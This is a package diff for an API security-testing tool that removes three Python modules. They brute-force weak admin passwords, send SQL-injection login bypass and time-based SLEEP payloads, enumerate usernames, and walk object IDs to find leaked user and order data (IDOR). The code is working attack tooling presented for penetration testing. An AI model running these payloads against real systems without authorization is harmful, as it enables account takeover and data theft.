opencode-api-security-testing 3.0.8 → 3.0.10

package/core/testers/auth_tester.py

@@ -1,264 +0,0 @@
-"""
-认证测试 - 测试认证绕过、暴力破解、用户枚举
-输入: {login_url, test_mode, payloads, max_attempts}
-输出: {vulnerable, bypass_payload, weak_credential, lockout_detected}
-"""
-
-import requests
-import time
-import json
-
-requests.packages.urllib3.disable_warnings()
-
-
-# 认证绕过Payload
-AUTH_BYPASS_PAYLOADS = [
-    {"username": "admin", "password": "admin"},
-    {"username": "admin", "password": "123456"},
-    {"username": "admin", "password": "admin123"},
-    {"username": "test", "password": "test"},
-    {"username": "' OR '1'='1", "password": "any"},
-    {"username": "admin'--", "password": "any"},
-    {"username": "1' OR '1'='1", "password": "1"},
-]
-
-# 弱密码
-WEAK_PASSWORDS = [
-    "123456", "password", "admin", "admin123",
-    "123123", "000000", "111111", "12345678",
-    "qwerty", "abc123", "1234", "12345"
-]
-
-
-def auth_tester(config):
-    """
-    测试认证安全
-    
-    输入:
-        login_url: string - 登录接口URL
-        test_mode: "sqli" | "bypass" | "bruteforce" | "enum"
-        payloads?: object[] - 自定义payload
-        max_attempts?: number - 最大尝试次数
-    
-    输出:
-        vulnerable: boolean
-        bypass_payload?: object
-        weak_credential?: {user, pass}
-        lockout_detected: boolean
-    """
-    login_url = config.get('login_url')
-    test_mode = config.get('test_mode', 'bypass')
-    payloads = config.get('payloads', AUTH_BYPASS_PAYLOADS)
-    max_attempts = config.get('max_attempts', 10)
-    
-    result = {
-        'vulnerable': False,
-        'bypass_payload': None,
-        'weak_credential': None,
-        'lockout_detected': False
-    }
-    
-    if test_mode == 'sqli' or test_mode == 'bypass':
-        # SQL注入绕过测试
-        sqli_payloads = [p for p in payloads if "'" in str(p.get('username', '')) or "'" in str(p.get('password', ''))]
-        
-        for payload in sqli_payloads[:5]:
-            try:
-                resp = requests.post(
-                    login_url,
-                    json=payload,
-                    timeout=5,
-                    verify=False,
-                    headers={'Content-Type': 'application/json'}
-                )
-                
-                if resp.status_code == 200:
-                    try:
-                        data = resp.json()
-                        # 检查是否登录成功
-                        if data.get('success') == True or data.get('code') == 0:
-                            if data.get('token') or data.get('data', {}).get('token'):
-                                result['vulnerable'] = True
-                                result['bypass_payload'] = payload
-                                return result
-                    except:
-                        pass
-            except:
-                pass
-    
-    if test_mode == 'bruteforce' or test_mode == 'bypass':
-        # 暴力破解测试
-        lockout_detected = False
-        attempts_before_lockout = 0
-        
-        for i, pwd in enumerate(WEAK_PASSWORDS[:max_attempts]):
-            try:
-                resp = requests.post(
-                    login_url,
-                    json={"username": "admin", "password": pwd},
-                    timeout=3,
-                    verify=False,
-                    headers={'Content-Type': 'application/json'}
-                )
-                
-                attempts_before_lockout += 1
-                
-                if resp.status_code == 200:
-                    try:
-                        data = resp.json()
-                        if data.get('success') == True or data.get('code') == 0:
-                            result['vulnerable'] = True
-                            result['weak_credential'] = {"user": "admin", "pass": pwd}
-                            return result
-                    except:
-                        pass
-                
-                # 检查是否被锁定
-                if resp.status_code == 429 or 'lock' in resp.text.lower():
-                    lockout_detected = True
-                
-                time.sleep(0.5)  # 避免过快请求
-                
-            except:
-                pass
-        
-        result['lockout_detected'] = lockout_detected
-        result['attempts_before_lockout'] = attempts_before_lockout
-    
-    if test_mode == 'enum':
-        # 用户枚举测试
-        error_responses = {}
-        
-        test_users = [
-            "admin", "test", "user", "administrator",
-            "root", "guest", "nonexistent_user_12345"
-        ]
-        
-        for user in test_users:
-            try:
-                resp = requests.post(
-                    login_url,
-                    json={"username": user, "password": "wrongpwd"},
-                    timeout=5,
-                    verify=False,
-                    headers={'Content-Type': 'application/json'}
-                )
-                
-                if resp.status_code == 200:
-                    body = str(resp.json())
-                    error_responses[user] = body
-                
-                time.sleep(0.3)
-            except:
-                pass
-        
-        # 分析响应差异
-        unique_responses = set(error_responses.values())
-        if len(unique_responses) > 1:
-            # 存在响应差异，可能可以枚举用户
-            result['vulnerable'] = True
-            result['enum_possible'] = True
-            result['response_patterns'] = len(unique_responses)
-    
-    return result
-
-
-def test_session_fixation(login_url):
-    """
-    测试会话固定攻击
-    
-    输入:
-        login_url: string
-    
-    输出:
-        vulnerable: boolean
-        fixation_detected: boolean
-    """
-    # 生成测试session
-    test_session = "test_session_12345"
-    
-    # 使用测试session访问登录页
-    try:
-        resp1 = requests.get(login_url, timeout=5, verify=False)
-        
-        # 登录（使用测试session）
-        login_data = {
-            "username": "test",
-            "password": "test",
-            "session": test_session
-        }
-        resp2 = requests.post(
-            login_url,
-            json=login_data,
-            timeout=5,
-            verify=False,
-            cookies={'JSESSIONID': test_session}
-        )
-        
-        # 登录后session应该改变
-        if 'set-cookie' in resp2.headers:
-            set_cookie = resp2.headers['set-cookie'].lower()
-            if test_session in set_cookie:
-                return {
-                    'vulnerable': True,
-                    'fixation_detected': True,
-                    'reason': 'Session未在登录后改变'
-                }
-        
-    except:
-        pass
-    
-    return {
-        'vulnerable': False,
-        'fixation_detected': False
-    }
-
-
-def check_error_difference(login_url):
-    """
-    检查登录错误响应差异（用于用户枚举）
-    
-    输入:
-        login_url: string
-    
-    输出:
-        has_difference: boolean
-        patterns: number
-    """
-    test_cases = [
-        {"username": "admin", "password": "wrong"},
-        {"username": "nonexist", "password": "wrong"},
-        {"username": "test", "password": "wrong"},
-    ]
-    
-    responses = []
-    
-    for case in test_cases:
-        try:
-            resp = requests.post(
-                login_url,
-                json=case,
-                timeout=5,
-                verify=False,
-                headers={'Content-Type': 'application/json'}
-            )
-            responses.append(str(resp.json()))
-        except:
-            responses.append("error")
-    
-    unique = set(responses)
-    
-    return {
-        'has_difference': len(unique) > 1,
-        'patterns': len(unique),
-        'responses': responses
-    }
-
-
-if __name__ == '__main__':
-    # 测试
-    result = auth_tester({
-        'login_url': 'http://example.com/api/login',
-        'test_mode': 'bypass'
-    })
-    print(f"Vulnerable: {result['vulnerable']}")

package/core/testers/idor_tester.py

@@ -1,200 +0,0 @@
-"""
-IDOR越权测试 - 测试参数遍历越权
-输入: {target_url, param_name, test_ids, auth_token}
-输出: {vulnerable: boolean, leaked_ids: [{id, data}], severity}
-"""
-
-import requests
-import json
-import re
-
-requests.packages.urllib3.disable_warnings()
-
-
-def idor_tester(config):
-    """
-    测试IDOR越权漏洞
-    
-    输入:
-        target_url: string - 目标URL
-        param_name: string - 参数名 (如 userId, orderNo)
-        test_ids: string[] | number[] - 测试ID列表
-        auth_token?: string - 认证token
-    
-    输出:
-        vulnerable: boolean
-        leaked_ids: Array<{id, data}>
-        severity: "high" | "medium" | "low"
-    """
-    target_url = config.get('target_url')
-    param_name = config.get('param_name', 'id')
-    test_ids = config.get('test_ids', [1, 2, 3])
-    auth_token = config.get('auth_token')
-    
-    headers = {}
-    if auth_token:
-        headers['Authorization'] = f'Bearer {auth_token}'
-    
-    leaked_ids = []
-    different_responses = 0
-    total_responses = 0
-    
-    baseline_response = None
-    baseline_data = None
-    
-    for test_id in test_ids:
-        # 构建测试URL
-        if '?' in target_url:
-            test_url = f"{target_url}&{param_name}={test_id}"
-        else:
-            test_url = f"{target_url}?{param_name}={test_id}"
-        
-        try:
-            resp = requests.get(test_url, headers=headers, timeout=10, verify=False)
-            total_responses += 1
-            
-            if resp.status_code == 200:
-                try:
-                    data = resp.json()
-                    data_str = json.dumps(data)
-                    
-                    # 保存第一个响应作为baseline
-                    if baseline_response is None:
-                        baseline_response = data_str
-                        baseline_data = data
-                    else:
-                        # 比较响应是否不同
-                        if data_str != baseline_response:
-                            different_responses += 1
-                            # 检查是否包含有效数据
-                            if contains_business_data(data):
-                                leaked_ids.append({
-                                    'id': test_id,
-                                    'data': data_str[:500],
-                                    'size': len(data_str)
-                                })
-                except:
-                    pass
-                    
-        except Exception as e:
-            pass
-    
-    # 判断漏洞
-    vulnerable = False
-    severity = 'low'
-    
-    if len(leaked_ids) > 0:
-        vulnerable = True
-        severity = 'high'
-    elif different_responses > 0 and total_responses > 1:
-        # 有响应差异但没有泄露数据
-        vulnerable = False
-        severity = 'low'
-    
-    return {
-        'vulnerable': vulnerable,
-        'leaked_ids': leaked_ids,
-        'severity': severity,
-        'different_responses': different_responses,
-        'total_responses': total_responses
-    }
-
-
-def contains_business_data(data):
-    """判断是否包含业务数据"""
-    if not isinstance(data, dict):
-        return False
-    
-    # 检查是否有意义的业务字段
-    business_fields = [
-        'user', 'username', 'userId', 'user_id', 'name',
-        'phone', 'email', 'mobile',
-        'order', 'orderId', 'order_no',
-        'balance', 'amount', 'money',
-        'id', '_id',
-        'token', 'session'
-    ]
-    
-    data_str = json.dumps(data).lower()
-    
-    # 简单判断：包含多个业务字段
-    match_count = sum(1 for f in business_fields if f.lower() in data_str)
-    
-    return match_count >= 2
-
-
-def idor_chain_tester(config):
-    """
-    测试IDOR链 - 从用户ID到订单ID到退款
-    
-    输入:
-        base_url: string
-        user_ids: number[]
-        order_ids?: number[]
-    
-    输出:
-        chain_found: boolean
-        chain_steps: Array<{endpoint, param, result}>
-    """
-    base_url = config.get('base_url')
-    user_ids = config.get('user_ids', [1, 2])
-    order_ids = config.get('order_ids', [1, 2])
-    
-    chain_steps = []
-    
-    # Step 1: 测试用户信息
-    for uid in user_ids:
-        url = f"{base_url}/api/user/info?userId={uid}"
-        try:
-            resp = requests.get(url, timeout=5, verify=False)
-            if resp.status_code == 200:
-                try:
-                    data = resp.json()
-                    if contains_business_data(data):
-                        chain_steps.append({
-                            'step': 1,
-                            'endpoint': '/api/user/info',
-                            'param': f'userId={uid}',
-                            'result': 'leaked'
-                        })
-                except:
-                    pass
-        except:
-            pass
-    
-    # Step 2: 测试订单列表
-    for uid in user_ids:
-        url = f"{base_url}/api/order/list?userId={uid}"
-        try:
-            resp = requests.get(url, timeout=5, verify=False)
-            if resp.status_code == 200:
-                try:
-                    data = resp.json()
-                    if isinstance(data, dict) and data.get('data'):
-                        chain_steps.append({
-                            'step': 2,
-                            'endpoint': '/api/order/list',
-                            'param': f'userId={uid}',
-                            'result': 'leaked'
-                        })
-                except:
-                    pass
-        except:
-            pass
-    
-    chain_found = len(chain_steps) > 0
-    
-    return {
-        'chain_found': chain_found,
-        'chain_steps': chain_steps
-    }
-
-
-if __name__ == '__main__':
-    # 测试
-    result = idor_tester({
-        'target_url': 'http://example.com/api/user/info',
-        'param_name': 'userId',
-        'test_ids': [1, 2, 3]
-    })
-    print(f"Vulnerable: {result['vulnerable']}, Leaked: {len(result['leaked_ids'])}")

package/core/testers/sqli_tester.py

@@ -1,211 +0,0 @@
-"""
-SQL注入测试
-输入: {target_url, method, param_name, payloads, check_union, check_boolean}
-输出: {vulnerable, payload_used, error_detected, time_based}
-"""
-
-import requests
-import json
-import time
-import re
-
-requests.packages.urllib3.disable_warnings()
-
-
-# SQL注入Payload
-SQLI_PAYLOADS = [
-    "' OR '1'='1",
-    "' OR '1'='1' --",
-    "' OR '1'='1' #",
-    "admin'--",
-    "admin' OR '1'='1",
-    "' UNION SELECT NULL--",
-    "' UNION SELECT NULL,NULL--",
-    "' UNION SELECT 1,2,3--",
-    "1' AND '1'='1",
-    "1' AND '1'='2",
-    "1' OR '1'='1",
-]
-
-# SQL错误特征
-SQL_ERROR_PATTERNS = [
-    'sql', 'syntax error', 'mysql', 'postgresql', 'oracle',
-    'sqlite', 'sqlstate', 'microsoft sql', 'odbc driver',
-    'sql error', 'sqlsrv', 'mariadb', 'access denied',
-    'sql_injection', 'sql injection'
-]
-
-
-def sqli_tester(config):
-    """
-    测试SQL注入漏洞
-    
-    输入:
-        target_url: string - 目标URL
-        method: "GET" | "POST"
-        param_name?: string - 参数名
-        payloads?: string[] - 自定义payload
-        check_union?: boolean - 是否检测UNION注入
-        check_boolean?: boolean - 是否检测布尔注入
-    
-    输出:
-        vulnerable: boolean
-        payload_used?: string
-        error_detected?: string
-        time_based?: boolean
-    """
-    target_url = config.get('target_url')
-    method = config.get('method', 'POST').upper()
-    param_name = config.get('param_name', 'id')
-    payloads = config.get('payloads', SQLI_PAYLOADS)
-    
-    result = {
-        'vulnerable': False,
-        'payload_used': None,
-        'error_detected': None,
-        'time_based': False
-    }
-    
-    for payload in payloads:
-        try:
-            # 构建测试请求
-            if method == 'GET':
-                if '?' in target_url:
-                    test_url = f"{target_url}&{param_name}={payload}"
-                else:
-                    test_url = f"{target_url}?{param_name}={payload}"
-                resp = requests.get(test_url, timeout=10, verify=False)
-            else:
-                test_data = {param_name: payload}
-                resp = requests.post(
-                    target_url,
-                    json=test_data,
-                    timeout=10,
-                    verify=False
-                )
-            
-            # 检查SQL错误
-            if resp.status_code == 200:
-                body = resp.text.lower()
-                
-                # 检查是否包含SQL错误
-                for error_pattern in SQL_ERROR_PATTERNS:
-                    if error_pattern in body:
-                        result['vulnerable'] = True
-                        result['payload_used'] = payload
-                        result['error_detected'] = error_pattern
-                        return result
-                
-                # 检查响应差异（可能表示注入生效）
-                if "or '1'='1" in payload.lower():
-                    # 布尔注入测试
-                    # 正常: 1 -> 假: payload -> 应该不同
-                    pass
-            
-        except Exception as e:
-            pass
-    
-    return result
-
-
-def sqli_time_based_tester(config):
-    """
-    时间盲注测试
-    
-    输入:
-        target_url: string
-        method: "GET" | "POST"
-        param_name: string
-        delay: number - 延迟秒数
-    
-    输出:
-        vulnerable: boolean
-        time_taken: number
-    """
-    target_url = config.get('target_url')
-    method = config.get('method', 'GET').upper()
-    param_name = config.get('param_name', 'id')
-    delay = config.get('delay', 5)
-    
-    payload = f"1' AND SLEEP({delay})--"
-    
-    start = time.time()
-    
-    try:
-        if method == 'GET':
-            test_url = f"{target_url}?{param_name}={payload}"
-            resp = requests.get(test_url, timeout=30, verify=False)
-        else:
-            test_data = {param_name: payload}
-            resp = requests.post(target_url, json=test_data, timeout=30, verify=False)
-        
-        elapsed = time.time() - start
-        
-        if elapsed >= delay:
-            return {
-                'vulnerable': True,
-                'time_taken': elapsed,
-                'payload': payload
-            }
-    except:
-        pass
-    
-    return {
-        'vulnerable': False,
-        'time_taken': elapsed if 'elapsed' in dir() else 0
-    }
-
-
-def verify_sqli_response(response):
-    """
-    验证响应是否是SQL注入结果
-    
-    输入:
-        response: {status, body, headers}
-    
-    输出:
-        is_sqli: boolean
-        sqli_type: string
-        evidence: string
-    """
-    body = response.get('body', '').lower()
-    
-    # 检查SQL错误
-    for pattern in SQL_ERROR_PATTERNS:
-        if pattern in body:
-            return {
-                'is_sqli': True,
-                'sqli_type': 'error_based',
-                'evidence': pattern
-            }
-    
-    # 检查是否是数据库错误JSON
-    try:
-        data = json.loads(response.get('body', ''))
-        if isinstance(data, dict):
-            msg = str(data.get('msg', '')).lower()
-            for pattern in SQL_ERROR_PATTERNS:
-                if pattern in msg:
-                    return {
-                        'is_sqli': True,
-                        'sqli_type': 'error_based',
-                        'evidence': msg[:200]
-                    }
-    except:
-        pass
-    
-    return {
-        'is_sqli': False,
-        'sqli_type': None,
-        'evidence': None
-    }
-
-
-if __name__ == '__main__':
-    # 测试
-    result = sqli_tester({
-        'target_url': 'http://example.com/api/login',
-        'method': 'POST',
-        'param_name': 'username'
-    })
-    print(f"Vulnerable: {result['vulnerable']}")